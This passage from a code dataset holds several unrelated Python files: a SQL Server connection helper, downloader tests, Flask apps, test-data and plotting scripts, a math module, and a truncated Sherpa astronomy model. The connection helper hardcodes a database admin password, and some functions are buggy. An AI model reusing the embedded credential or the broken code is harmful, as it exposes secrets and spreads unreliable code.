Pandas/h_group.py","file_name":"h_group.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"646172267","text":"import all_servers.getconn\nimport all_servers.getCompanyDBs\nimport sys \nprint(sys.version)\n\nix=0\ntotal=0\n\nclass DBCompany:\n def __init__(self, name, csr):\n self.name = name\n self.csr = csr \n\n def getHeader(self):\n global ix\n ix+=1\n header = '%s/%s %s' % (ix, total, self.name)\n return header #print()\n\n def doSql(self, sql, fetch=True):\n self.csr.execute( 'use [%s]' % self.name )\n self.csr.execute(sql)\n if fetch:\n x = self.csr.fetchall()\n else:\n x=''\n #print(x)\n return x\n\n\n def validDB(self, verbose=True): \n valid_sql = \"\"\"\nselect count(*) from INFORMATION_SCHEMA.TABLES\nwhere table_name = 'uorgs_Users'\n\"\"\"\n self.csr.execute( 'use [%s]' % self.name )\n self.csr.execute(valid_sql)\n r = self.csr.fetchall()\n #print(r)\n r = r[0] # take first row.\n #print(r)\n r = r[0] # take first column.\n #print(r)\n isValid = (r > 0)\n if not isValid and verbose:\n print('invalid db:', self.name)\n\n return isValid\n\n\n\n\n\n\n\n\ndbConn = ''\n\n\ndef getAll_DB_Conns(DV):\n global total, dbConn\n\n masterDB1 = '192.168.15.27' #'AjourSQL'\n #masterDB1 = r'jg-pc\\JG1'\n theDBCfg = { 'server': masterDB1, 'db': 'master', 'user': 'sa', 'pwd': 'morOg234' }\n\n #with all_servers.getconn.getConn(theDBCfg) as conn:\n dbConn = all_servers.getconn.getConn(theDBCfg) \n\n csr = dbConn.cursor()\n companyDBs = all_servers.getCompanyDBs.getCompanyDBList(csr, DV)\n\n #companyObjs = list( map( lambda x: DBCompany(x), companyDBs) )\n companyObjs = [ DBCompany(name, csr) for name in companyDBs ]\n total = len(companyDBs)\n #print(type(companyObjs))\n return companyObjs #companyDBs\n\n# http://www.u.arizona.edu/~erdmann/mse350/topics/list_comprehensions.html\n\n\nalone = (__name__ == \"__main__\") \nif alone:\n all = getAll_DB_Conns()\n print(len(all))\n\n","sub_path":"sqlserver_all2/all_servers/get_all_the_servers.py","file_name":"get_all_the_servers.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533519183","text":"import asyncio\nimport time\nfrom pathlib import Path\n\nimport aiohttp\n\nfrom Scripts.Downloader.Novel.nparse import WuxiaWorldCo\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\n\nfrom Scripts.Downloader.Novel.services import save_content, save\n\n\nasync def get_content_save_function():\n nparse = 
WuxiaWorldCo()\n resp = requests.get('https://m.wuxiaworld.co/Lord-of-the-Mysteries/2752246.html')\n print(f'[STATUS CODE] {resp.status_code}'\n f'\\n[CONTENT LENGTH] {resp.headers[\"content-length\"]}')\n\n if resp.ok:\n markup = resp.text\n soup = BeautifulSoup(markup, parser='html.parser', features='lxml')\n content = nparse.parse_content(soup)\n await save_content(content, Path('testfile.chapter'))\n print(f'[CONTENT]\\n{content}')\n\nasync def fetch(session, url):\n stime = time.perf_counter()\n async with session.get(url) as response:\n await response.text()\n return time.perf_counter() - stime\n\nasync def arequest_duration(url):\n async with aiohttp.ClientSession() as session:\n tasks = []\n durations = []\n for i in range(10):\n task = asyncio.create_task(fetch(session, url))\n durations.append(await task)\n # task = asyncio.create_task(fetch(session, url))\n # tasks.append(task)\n # durations = await asyncio.gather(*tasks)\n print(f'[AVERAGE DURATION] {sum(durations) / len(durations)}')\n\ndef request_duration(url):\n durations = []\n for i in range(10):\n start = time.perf_counter()\n content = requests.get(url).text\n duration = time.perf_counter() - start\n durations.append(duration)\n # print(f'[DURATION] {duration:0.2f} s')\n print(f'[AVERAGE DURATION] {sum(durations) / len(durations)}')\n\ndef duration_tests():\n url = 'https://www.google.com/'\n print('[SYNCHRONOUS REQUESTS]')\n request_duration(url)\n\n print('\\n[ASYNCHRONOUS REQUESTS]')\n loop = asyncio.get_event_loop()\n start = time.perf_counter()\n try:\n loop.run_until_complete(arequest_duration(url))\n except Exception as ex:\n print(ex)\n finally:\n print(f'[DURATION] {time.perf_counter() - start:0.2f} s')\n loop.close()\n\nasync def save_data_create_dir_if_not_exists():\n filepath = Path('test_files', 'new.txt')\n await save('', filepath)\n\nif __name__ == '__main__':\n # duration_tests()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(save_data_create_dir_if_not_exists())\n loop.close()\n","sub_path":"Scripts/Downloader/Novel/tests/function_tests.py","file_name":"function_tests.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641580386","text":"from flask import Flask, render_template, Response\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\nfrom imutils.video import VideoStream\nimport numpy as np\nimport imutils\nimport time\nimport cv2\nimport os\n\napp = Flask(__name__,template_folder='Template')\n\ndef detect_and_predict_mask(frame, faceNet, maskNet):\n # grab dimensions of frame then construct a blob from it\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(frame,1.0, (192,192),\n (104.0,177.0,123.0))\n \n # pass the blob through the network and obtain the face detections\n faceNet.setInput(blob)\n detections = faceNet.forward()\n print(detections.shape)\n \n # init list of faces and corresponding locations, and the list of predictions from our facemask network\n \n faces = []\n locations = []\n predictions = []\n \n # loop over the detections\n for i in range(0, detections.shape[2]):\n # extract the confidence(probability) associated with the detection\n confidence = detections[0,0,i,2]\n \n # filter out weak detections by ensuring the confidence is greater than the minimum confidence\n if confidence > 0.5:\n # compute the (x, y)-coordinates of the 
bounding box for the object\n box = detections[0,0,i,3:7] * np.array([w,h,w,h])\n (startX, startY, endX, endY) = box.astype('int')\n \n # make sure the bounding boxes fall within the dimensions of the frame\n (startX, startY) = (max(0, startX), max(0, startY))\n (endX, endY) = (min(w-1, endX), min(h-1, endY))\n \n # extract the face Region Of Interest, convert it from BGR to RGB channel ordering, resize it, and preprocess it\n face = frame[startY:endY, startX:endX]\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n face = cv2.resize(face, (224,224))\n face = img_to_array(face)\n face = preprocess_input(face)\n \n # add the face and bounding boxes to their respective lists\n faces.append(face)\n locations.append((startX, startY, endX, endY))\n \n # only make the predictions if at least one face was detected\n if len(faces) > 0:\n # for faster inference we'll make batch predictions on all faces at the same time rather than one-by-one predictions in the obove for loop\n faces = np.array(faces)\n predictions = maskNet.predict(faces, batch_size=32)\n \n # return tuple of the face locations and their corresponding locations\n return (locations, predictions)\n\n# load our serialized face detector model from disk\nprototxt_path = r\"../face_detector/deploy.prototxt\"\nweightsPath = r\"../face_detector/res10_300x300_ssd_iter_140000.caffemodel\"\nfaceNet = cv2.dnn.readNet(prototxt_path,weightsPath)\n\n# load face mask detector model from disk\nmaskNet = load_model(\"detect_mask.model\")\n\n# init the video stream\nprint(\"[INFO] Starting video stream...\")\n\n\ndef get_frames():\n vs = VideoStream(0).start()\n # loop over the frames from the video stream\n while True:\n # grab the frame from threaded video stream and resize it to have max width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=400)\n\n # detect faces in the frame and determ if they are wearing mask, not wearing, or worn incorrectly\n (locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet)\n\n # loop over detected fadce locations and their corresponding locations\n for (box, pred) in zip(locs, preds):\n # unpack the bounding box and predictions\n (startX, startY, endX, endY) = box\n (mask, withoutMask) = pred\n\n # determine the class label and color we'll use to draw the bounding box and text\n label = \"Mask\" if mask > withoutMask else \"No Mask\"\n color = (0, 255, 0) if label == \"Mask\" else (0, 0, 255)\n\n # incl probability in the label\n label = \"{}: {:.2f}%\".format(label, max(mask, withoutMask) * 100)\n\n # display the label and bounding box rectangle on the output frame\n cv2.putText(frame,label, (startX, startY-10), cv2.FONT_HERSHEY_SIMPLEX,0.45, color, 2)\n cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n\n # show output frame\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if 'q' key is pressed, break from the loop\n if key == ord('q'):\n break\n\n # do a bit of cleanup\n cv2.destroyAllWindows()\n vs.stop()\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n@app.route('/video')\ndef video():\n return Response(get_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')\n\nif __name__==\"__main__\":\n app.run(debug=True)","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"307757364","text":"#!/usr/bin/env python\n\nfrom cyaron import * # 引入CYaRon的库\n\nfor i in range(11, 21): # 即在[1, 
4)范围内循环,也就是从1到3\n test_data = IO(file_prefix=\"T19272\", data_id=i) # 生成 heat[1|2|3].in/out 三组测试数据\n\n n = randint(3,100000) \n tree=Graph.tree(n);\n test_data.input_writeln(n)\n for edge in tree.iterate_edges():\n test_data.input_writeln(edge.start,edge.end)\n for j in range(1, n+1): \n test_data.input_write(randint(1,1000))\n print(i)\n test_data.output_gen(\"T19853.exe\")\n \n","sub_path":"2018-1-9/T19853.py","file_name":"T19853.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387474424","text":"from flask import Flask, render_template, url_for, abort, request\nfrom queue_model import *\nimport logging\nimport os\nimport time\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\nport = config['Server']['port']\ndebug = config['Server']['debug'].strip() == 'True'\nname = config['Server']['name']\n\napp = Flask(name)\n\n@app.route('/')\ndef index():\n s = QueueModel.select()\n return render_template('index.html', Camera1=s[0].id, Camera2=s[1].id, Camera3=s[3].id,\n Number1=s[0].number_of_people, Number2=s[1].number_of_people,\n Number3=s[3].number_of_people)\n\n#Возвратит кол-во людей в данной очереди\n@app.route('/home/PeopleNumber/', methods=['GET'])\ndef getNearshop(number):\n for i in QueueModel.select():\n if number == i.id:\n amount = i.number_of_people\n\n return(f\"В данной очереди в настоящий момент находится {amount} человек\")\n\nif __name__ == '__main__':\n app.run(port=port, debug=debug, host='0.0.0.0')","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443145376","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 12 14:37:28 2020\n\n@author: alex.messina\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\nimport datetime as dt\nimport numpy as np\nimport os\n#from Rating_curve import *\n## Set Pandas display options\npd.set_option('display.large_repr', 'truncate')\npd.set_option('display.width', 180)\npd.set_option('display.max_rows', 40)\npd.set_option('display.max_columns', 13)\nplt.ion()\n\n## Set Storm start and end\nstorm_start = dt.datetime(2021,3,10,0,0)\nstorm_end = dt.datetime(2021,3,12,23)\n\nuse_recorded_flow = True\n#use_recorded_flow = False\n\ncfs = ['ViaRancho','DELDIOS', 'FELICITA', 'KITCARSON','GREENVALLEY', 'MOONSONG','CLOVERDALE','GUEJITO','SYCAMORE','SDGCRK']\ngpm = ['ElKu','Tazon','Oceans11','Lomica']\n\n#### INDIVIDUAL SITES\n#creeks\nsite_list = ['DELDIOS']\n#site_list = ['FELICITA']\n#site_list = ['KITCARSON']\n#site_list = ['CLOVERDALE']\n#site_list = ['GUEJITO']\n#site_list = ['SDGCRK']\n#site_list = ['MOONSONG']\n#site_list = ['GREENVALLEY']\n#site_list = ['SYCAMORE']\n#outfalls\nsite_list = ['ElKu']\n#site_list = ['ViaRancho']\n#site_list = ['Tazon']\n#site_list = ['Oceans11']\n#site_list = ['Lomica']\n\n\n\n## CREEKS\n#site_list = ['DELDIOS', 'FELICITA', 'KITCARSON','GREENVALLEY', 'MOONSONG','CLOVERDALE','GUEJITO','SYCAMORE','SDGCRK']\n\n## OUTFALLS\n#site_list = ['ElKu','ViaRancho','Tazon','Oceans11','Lomica']\n\n\nfor site in site_list:\n print (site)\n #datadir = 'C:/Users/alex.messina/Documents/GitHub/Sutron_scripts/Data Download/Log backup 5_11_2020/'\n datadir = 'C:/Users/alex.messina/Documents/LinkComm/Log Files/'\n df = pd.DataFrame()\n \n ## Time Series Data\n for fname in [f for f in os.listdir(datadir) if site in f and 'loggrp' 
in f]:\n print (fname)\n df_ind = pd.read_csv(datadir+fname,index_col=0,header=0,skiprows=[1])\n \n ## Rename flow data column\n if site in gpm:\n flow_units = 'gpm'\n print ('Rename PT Flow to Flow_gpm')\n df_ind = df_ind.rename(columns={'PT Flow':'Flow_gpm','Flow _PT':'Flow_gpm','Flow_PT':'Flow_gpm'})\n if site in cfs:\n flow_units = 'cfs'\n print ('Rename PT Flow to Flow_cfs')\n df_ind = df_ind.rename(columns={'PT Flow':'Flow_cfs','Flow _PT':'Flow_cfs','Flow_PT':'Flow_cfs'}) \n ## Rename Level\n df_ind = df_ind.rename(columns={'PT Level':'Level_PT'}) \n \n if site=='GREENVALLEY':\n df_ind = df_ind.rename(columns={'PT North':'Level_PT_No', 'PT South':'Level_PT_So'}) \n \n \n ## Rename other stuff\n df_ind = df_ind.rename(columns={'Aliquot_Num':'AliquotNum','Curr_pacing':'SamplePacin','FlowVolume':'Incr_Flow'})\n \n ## Combine date and time\n if 'Time' in df_ind.columns:\n df_ind.index = pd.to_datetime(df_ind.index +' '+ df_ind['Time']) \n df_ind.index = pd.to_datetime(df_ind.index)\n ## append to df\n df = df.append(df_ind)#,sort=True)\n \n ##format df\n # Replace error values == -99999\n df = df.replace(-99999,np.nan)\n df = df.replace(-99,np.nan)\n # ensure datetime index and drop duplicates\n df.index = pd.to_datetime(df.index)\n df['Datetime'] = df.index\n df = df.drop_duplicates(subset='Datetime')\n \n # Interpolate battery level\n if 'Battery_950' in df.columns:\n df['Battery_950'] = df['Battery_950'].interpolate('linear',axis=0,limit = 13)\n \n # Interpolate data to fill gap\n for col in ['Level_950','Vel_950','Flow_950']:\n if col in df:\n df[col] = df[col].interpolate('linear',axis=0,limit=3)\n \n if site == 'Tazon':\n df['Flow_gpm'] = df['Flow_950']\n df['Level_PT'] = df['Level_950']\n\n# df['PT Level'].plot()\n \n ## Alarm Data\n events = pd.DataFrame()\n for fname in [f for f in os.listdir(datadir) if site in f and 'events' in f]:\n print (fname)\n df_events = pd.read_csv(datadir+fname,index_col=0,header=0,skiprows=[1])\n if 'Time' in df_ind.columns:\n df_events.index = pd.to_datetime(df_events.index +' '+ df_devents['Time'])\n ## append to df\n events = events.append(df_events,sort=True)\n # ensure datetime index and drop duplicates\n events.index = pd.to_datetime(events.index)\n events['Datetime'] = events.index\n events = events.drop_duplicates(subset='Datetime') \n \n ## Event df's\n ## Aliquots\n aliquots = events[events['Label']=='Triggered S'][['Label','Value']]\n manual_grabs = events[events['Label']=='Trigger Man'][['Label','Value']]\n if site in gpm:\n aliquots['Flow_gpm'] = df['Flow_gpm']\n if site in cfs:\n aliquots['Flow_cfs'] = df['Flow_cfs']\n aliquots = aliquots.dropna()\n aliquots['Datetime'] = aliquots.index \n aliquots['Time between aliquots'] = aliquots['Datetime'].diff()\n aliquots = aliquots.drop('Datetime',1)\n aliquots = aliquots.rename(columns={'Value':'Aliquot#'}) \n aliquots['Aliquot#'] = aliquots['Aliquot#'].astype(int)\n \n \n ## Alarms\n alarm_in = events[events['Label']=='Alarm In'][['Label','Value']]\n alarm_out = events[events['Label']=='Alarm Out'][['Label','Value']]\n ## Bottle changes\n bottle_change = events[events['Label']=='BottleChang'][['Label','Value']]\n\n ## \n ## now resample to 5Min \n# df = df.resample('1Min')#.mean() \n \n \n##%% RECALCULATE FLOWS\n if use_recorded_flow == False:\n ## Rating Curve\n rating_curves = pd.ExcelFile(datadir+'Current_RatingCurves.xlsx')\n rating_curve = rating_curves.parse(sheetname=site,skiprows=1,header=0)\n rating_curve = rating_curve.round(2)\n rating_curve.index = rating_curve['Stage (in)']\n ## 
From rating curve\n if site == 'GREENVALLEY':\n df['Flow_north_cfs'] = pd.DataFrame(df['Level_PT_No'].apply(lambda x: rating_table(rating_curve,float(x))),columns=['Level_PT_No'])\n df['Flow_south_cfs'] = pd.DataFrame(df['Level_PT_So'].apply(lambda x: rating_table(rating_curve,float(x))),columns=['Level_PT_So'])\n df['Flow_cfs'] = df['Flow_north_cfs'] + df['Flow_south_cfs']\n else:\n df['Flow_cfs'] = pd.DataFrame(level['Result'].apply(lambda x: rating_table(rating_curve,float(x))),columns=['Result'])\n \n#%% PLOT\n fig, ax1 = plt.subplots(1,1,figsize=(16,8))\n fig.suptitle(site,fontsize=14,fontweight='bold')\n \n ## Water Level\n if site=='GREENVALLEY':\n ax1.plot_date(df.index,df['Level_PT_No'],ls='-',marker='None',c='r',label='Water Level from PT North')\n ax1.plot_date(df.index,df['Level_PT_So'],ls='-',marker='None',c='g',label='Water Level from PT South')\n ax1.set_ylim(0, df['Level_PT_No'].max()*1.25)\n else:\n ax1.plot_date(df.index,df['Level_PT'],ls='-',marker='None',c='r',label='Water Level from PT')\n ax1.set_ylim(0, df['Level_PT'].max()*1.25)\n ax1.set_ylabel('Water Level (inches)',color='r',fontsize=14,fontweight='bold')\n ax1.spines['left'].set_color('r')\n ax1.tick_params(axis='y',colors='r',labelsize=14)\n ax1.xaxis.set_major_formatter(mpl.dates.DateFormatter('%A \\n %m/%d/%y %H:%M'))\n \n ## Flow\n ax2 = ax1.twinx()\n if site=='GREENVALLEY' and use_recorded_flow==False:\n print ('GREEN VALLEY recalculated flows')\n ax2.plot_date(df.index,df['Flow_north_cfs'] ,ls='-',marker='None',c='teal',label='Flow from HvF (north)')\n ax2.plot_date(df.index,df['Flow_south_cfs'] ,ls='-',marker='None',c='b',alpha=0.6,label='Flow from HvF (south)')\n ax2.plot_date(df.index,df['Flow_cfs'],ls='-',marker='None',c='b',label='Flow from HvF (Total)')\n else:\n if site in cfs:\n ax2.plot_date(df.index,df['Flow_cfs'],ls='-',marker='None',c='b',label='Flow from HvF')\n ax2.set_ylabel('Flow (cfs)',color='b',fontsize=14,fontweight='bold')\n ## Plot Aliquots\n if len(aliquots) >0:\n ax2.plot_date(aliquots.index,aliquots['Flow_cfs'],ls='None',marker='o',c='k',label='Aliquots')\n for al in aliquots.iterrows():\n #print (al)\n al_num = \"%.0f\"%al[1]['Aliquot#']\n ax2.annotate(al_num,xy=(pd.to_datetime(al[0]),al[1]['Flow_cfs']*1.05),ha='center')\n \n if site in gpm:\n ax2.plot_date(df.index,df['Flow_gpm'],ls='-',marker='None',c='b',label='Flow from HvF')\n ax2.set_ylabel('Flow (gpm)',color='b',fontsize=14,fontweight='bold')\n ax2.set_ylim(0, df['Flow_gpm'].max()*1.1)\n ## Plot Aliquots\n if len(aliquots) >0:\n ax2.plot_date(aliquots.index,aliquots['Flow_gpm'],ls='None',marker='o',c='k',label='Aliquots')\n for al in aliquots.iterrows():\n #print (al)\n al_num = \"%.0f\"%al[1]['Aliquot#']\n ax2.annotate(al_num,xy=(pd.to_datetime(al[0]),al[1]['Flow_gpm']*1.05),ha='center')\n ax2.xaxis.set_major_formatter(mpl.dates.DateFormatter('%A \\n %m/%d/%y %H:%M')) \n # Plot Bottle Changes\n for b_chng in bottle_change.iterrows():\n ax1.axvline(b_chng[0],label='Bottle: '+\"%.0f\"%b_chng[1]['Value'],c='grey',alpha=0.6)\n ax1.annotate('^ Bottle '+\"%.0f\"%b_chng[1]['Value']+' ^',xy=(b_chng[0],5),ha='left',rotation=-90)\n\n ## FMT \n ax2.spines['right'].set_color('b')\n ax2.tick_params(axis='y',colors='b',labelsize=14)\n \n ax1.legend(fontsize=14,ncol=1,loc='upper left')\n ax2.legend(fontsize=14,loc='upper right')\n \n plt.tight_layout()\n plt.subplots_adjust(top=0.95)\n \n ## Zoom to storm\n ax1.set_xlim(storm_start,storm_end)\n if site == 'GREENVALLEY':\n ax1.set_ylim(0, 
df.loc[storm_start:storm_end,'Level_PT_No'].max()*1.25)\n else:\n ax1.set_ylim(0, df.loc[storm_start:storm_end,'Level_PT'].max()*1.25)\n ax2.set_ylim(0, df.loc[storm_start:storm_end,'Flow_'+flow_units].max()*1.1)\n \n print (aliquots[storm_start:storm_end])\n print ('Minimum time between aliquots: '+ str(aliquots.loc[storm_start:storm_end,'Time between aliquots'].min()))\n \n print ('Peak flow rate: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Flow_'+flow_units].max() + flow_units)\n if site == 'GREENVALLEY':\n print ('Peak stage: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Level_PT_No'].max() + 'inches')\n print ('Peak stage: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Level_PT_So'].max() + 'inches')\n \n else:\n print ('Peak stage: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Level_PT'].max() + 'inches')\n\n\n#%%\nimport mpld3\nhtml_file= open('C:/Users/alex.messina/Documents/GitHub/Sutron_scripts/LakeHodges/Interactive Data Files/'+site+'-flow_data.html',\"w\")\nmpld3.save_html(fig,html_file)\nhtml_file.close()\n\n#%% Scatterplot 950 vs PT LEVEL\n\n#df = df[df.index > dt.datetime(2020,12,26)]\n\nfig,ax = plt.subplots(1,1)\nplt.scatter(df['Level_950'],df['Level_PT'],c='grey',alpha=0.5,label='raw data')\nplt.scatter(df['Level_950'],df['Level_PT']-0.75,c='r',label='-0.75 offset')\nplt.xlabel('Level 950'), plt.ylabel('Level PT')\nplt.xlim(0,18), plt.ylim(0,18)\nplt.plot([0,20],[0,20],ls='--',marker='None',c='grey')\nplt.legend()\n\n\n#%% Scatterplot 950 vs PT FLOW\nfig,ax = plt.subplots(1,1)\nplt.scatter(df['Flow_950'],df['Flow _PT'],c='grey',alpha=0.5)\nplt.scatter(df['Flow_950'],df['Flow _PT'],c='r')\nplt.xlabel('Flow 950'), plt.ylabel('Flow PT')\nplt.xlim(0,18), plt.ylim(0,18)\nplt.plot([0,20],[0,20],ls='--',marker='None',c='grey')\n\n#%% Scatterplot 950 Level Velocity\nfig,ax = plt.subplots(1,1)\nplt.scatter(df['Level_950'],df['Vel_950'],c='r',label='Level_950 vs Vel_950')\nplt.scatter(df['Level_PT'],df['Vel_950'],c='b',label='Level_PT vs Vel_950')\nplt.xlabel('Level 950 and Level_PT'), plt.ylabel('Velocity 950 ')\nplt.xlim(0,18), plt.ylim(0,18)\nplt.plot([0,20],[0,20],ls='--',marker='None',c='grey')\nlegend(loc='upper right')\n\n\n#%% SAVE TO CSV\n# if site == 'GREENVALLEY':\n# df_out = pd.DataFrame({'Level_North_in':level_north['Result'],'Level_South_in':level_south['Result'],'Flow_North_cfs':flow_north['Result'],'Flow_South_cfs':flow_south['Result'],'Flow_cfs':flow['Result']})\n# \n# else:\n# df_out = pd.DataFrame({'Level_in':level['Result'],'Flow_cfs':flow['Result']})\n# df_out = df_out[df_out != -99999.0].dropna()\n# \n# if site == 'SDGCRK':\n# ## just get rid of data prior since it wasn't offset and doesnt matter\n# df_out.ix[:dt.datetime(2020,3,18,8,50)] = np.nan\n# df_out = df_out.dropna()\n# # shift one hour forward to match PDT\n# df_out.ix[:dt.datetime(2020,3,26,15,0)] = df_out.ix[:dt.datetime(2020,3,26,15,0)].set_index(df_out.ix[:dt.datetime(2020,3,26,15,0)].index + dt.timedelta(minutes=60))\n# \n\n \n \n# df_out.to_csv(datadir +'just level and flow/'+ site+'_level_and_flow.csv')\n \n\n\n\n\n\n\n","sub_path":"Data_visualization_2020.py","file_name":"Data_visualization_2020.py","file_ext":"py","file_size_in_byte":12847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"412226932","text":"def bez(x, y): # Коэффииенты Безу\n print('Коэффициенты будут присвоенны переменным k_0 и k_1 соотвественно')\n def GCD(a, b):\n a = int(a)\n b = int(b)\n if b == 0:\n return a\n return GCD(b, a % b)\n def egcd(c, d):\n gcd = GCD(c, d)\n for v 
in range(10 ** 3):\n for u in range(10 ** 3):\n if v * c + u * d == gcd:\n return v, u, gcd\n if -v * c - u * d == gcd:\n return -v, -u, gcd\n if -v * c + u * d == gcd:\n return -v, u, gcd\n if v * c - u * d == gcd:\n return v, -u, gcd\n return 'ERROR' \n x = int(x)\n y = int(y)\n k = egcd(x, y)\n k_0 = k[0]\n k_1 = k[1]\n\n\n\ndef gcd(a, b): # НОД двух чисел\n a = int(a)\n b = int(b)\n if b == 0:\n return a\n return gcd(b, a % b)\n\n\n\ndef dec(func): # Декоратор\n def wrap(*args, **kwargs):\n res = func(*args, **kwargs)\n return res.upper()\n return wrap\n\n\n \ndef new_base(a, b): #Перевод числа a их 10-ной системы счисления в новую с.ч. b\n if b < 2:\n return \"ERROR\"\n output = \"\"\n while val != 0:\n arg = a % b\n if arg < 10:\n output += chr(arg + ord('0'))\n else:\n output += chr(arg + ord('A') - 10)\n a //= b\n return ''.join(reversed(output))\n\n\n\ndef prime_check(n): #Проверка числа на простоту\n import random\n def gcd(a,b):\n if b == 0:\n return a\n return gcd(b, a % b)\n def rec(b, n):\n if n == 0:\n return 1\n if n % 2 == 0:\n return rec(b*b, n/2)\n else:\n return b*rec(b, n-1)\n def check_ferma(n):\n for i in range(5):\n a = random.randint(1,1000)\n while gcd(a,n)>1 :\n a = random.randint(1,1000)\n if rec(a,n-1)%n != 1 :\n return False\n return True\n return check_ferma(n)\n\n\n\ndef gauss(A): #Метод Гаусса для реения системы линейных уравнений\n A = list(A)\n a = len(A[0])\n b = len(A)\n for k in range(0, a - 1): #По сути выбираем элементы глав. диагонали(те самый, на котрый буем делить)\n for q in range(k + 1, b): #Выбираем столбец, под элементом глав. диагонали, который мы выбрали выше\n for z in range(k, a): #Выбираем строку, начиная с элемента, индекс столбца которого равен индексу элемента на диагонаи\n w = A[q][k] / A[k][k]\n A[q][z] -= w * A[k][z]\n for l in range(b - 1, -1, - 1):\n for t in range(l - 1, -1, - 1):\n p = A[t][l] / A[l][l]\n A[t][a - 1] -= p * A[l][a - 1]\n A[t][l] = 0\n o = [0] * b\n for k in range(0, b): # Функция возваращает массив с решениями системы уравнений \n o[k] = A[k][k]\n return(o)\n\n","sub_path":"my_module.py","file_name":"my_module.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126276833","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/bxa/sherpa/background/xmm.py\n# Compiled at: 2020-01-28 12:31:59\n# Size of source mod 2**32: 19729 bytes\nfrom __future__ import print_function\nimport os\nfrom sherpa.astro.ui import *\nimport numpy\nprint('\\n\\nUsing XMM empirical background model originally by Richard Sturm.\\nPlease reference Maggi P., et al., 2014, A&A, 561, AA76.\\n\\n')\n\ndef get_embedded_file(filename):\n \"\"\"\n Gets the path of a file in the same folder as this script\n \"\"\"\n return os.path.join(os.path.dirname(__file__), filename)\n\n\ndef get_pn_bkg_model(i, galabs, fit=False):\n if get_rmf(i).energ_lo[0] == 0:\n get_rmf(i).energ_lo[0] = 0.001\n else:\n if get_arf(i).energ_lo[0] == 0:\n get_arf(i).energ_lo[0] = 0.001\n pnbrsp = get_response(i, bkg_id=1)\n pnscale = get_bkg_scale(i)\n dia_pn_rmf = get_embedded_file('pn_dia.rmf')\n dia_pn_arf = get_embedded_file('pn_dia.arf')\n copy_data(i, 1002)\n load_bkg_rmf(1002, dia_pn_rmf)\n load_bkg_arf(1002, dia_pn_arf)\n pnbunitrsp = get_response(1002, bkg_id=1)\n delete_data(1002)\n pncenters = [\n 1.49165, 1.49165, 4.53177, 
5.42516, 6.38155, 7.48675, 8.04087, 8.04087, 8.60924, 8.89395, 9.5616]\n pnlinewidth = [0.0573813, 0.0363469, 0.0610487, 0.070838, 0.0959053, 0.0652422, 0.0948594, 6.26174e-05, 0.120893, 0.114254, 0.108717]\n pnlinenorm = [0.00781356, 0.00396601, 0.000730727, 0.000496413, 5.31295e-09, 0.000684796, 0.0301564, 0.000141847, 0.00887887, 0.00575592, 0.00171367]\n pnbkgcons, pnbkgspline1, pnbkgexpdec, pnbkgsmedge1, pnbkgsmedge2, pnbkgspline2, pnbkginspl, pnbkgline1, pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline7, pnbkgline8, pnbkgline9, pnbkgline10, pnbkgline11, pnbkgpl, pnbkgapec, pnbkglcapec = (\n xsconstant.pncons, xsspline.pnspline1, xsexpdec.pnexpdec, xssmedge.pnsmedge1, xssmedge.pnsmedge2, xsspline.pnspline2, xspowerlaw.pnbkpl, xsgaussian.pngau1, xsgaussian.pngau2, xsgaussian.pngau3, xsgaussian.pngau4, xsgaussian.pngau5, xsgaussian.pngau6, xsgaussian.pngau7, xsgaussian.pngau8, xsgaussian.pngau9, xsgaussian.pngau10, xsgaussian.pngau11, xspowerlaw.pnpnexpl, xsapec.pnapec, xsapec.pnlcapec)\n pnlines = [\n pnbkgline1, pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline7, pnbkgline8, pnbkgline9, pnbkgline10, pnbkgline11]\n pnfixwid = [\n pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline8, pnbkgline11]\n pnfree = [pnbkgline1, pnbkgline7, pnbkgline9, pnbkgline10]\n pn_bkg = pnbunitrsp(pnbkgcons * (pnbkgspline1 * 